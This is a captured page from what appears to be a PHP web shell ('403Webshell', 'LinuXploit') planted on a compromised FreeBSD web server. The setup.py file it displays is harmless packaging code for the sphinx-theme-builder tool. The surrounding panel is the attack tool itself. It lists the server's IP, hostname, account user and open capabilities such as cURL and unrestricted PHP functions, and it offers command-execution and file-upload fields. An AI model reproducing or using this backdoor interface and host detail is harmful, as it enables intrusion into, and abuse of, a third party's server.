403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.116
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/textproc/py-sphinx-theme-builder/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/textproc/py-sphinx-theme-builder/files/setup.py
#!/usr/bin/env python
# setup.py generated by flit for tools that don't yet use PEP 517

from distutils.core import setup

packages = \
['sphinx_theme_builder',
 'sphinx_theme_builder._internal',
 'sphinx_theme_builder._internal.cli']

package_data = \
{'': ['*']}

package_dir = \
{'': 'src'}

install_requires = \
['packaging', 'rich', 'tomli', 'nodeenv', 'setuptools', 'pep621']

extras_require = \
{'cli': ['build', 'click', 'sphinx-autobuild']}

entry_points = \
{'console_scripts': ['stb = sphinx_theme_builder._internal.cli:main']}

setup(name='sphinx-theme-builder',
      version='%%PORTVERSION%%',
      description='A tool for authoring Sphinx themes with a simple (opinionated) workflow.',
      author=None,
      author_email='Pradyun Gedam <mail@pradyunsg.me>',
      url=None,
      packages=packages,
      package_data=package_data,
      package_dir=package_dir,
      install_requires=install_requires,
      extras_require=extras_require,
      entry_points=entry_points,
      python_requires='>=3.7',
     )

Youez - 2016 - github.com/yon3zu
LinuXploit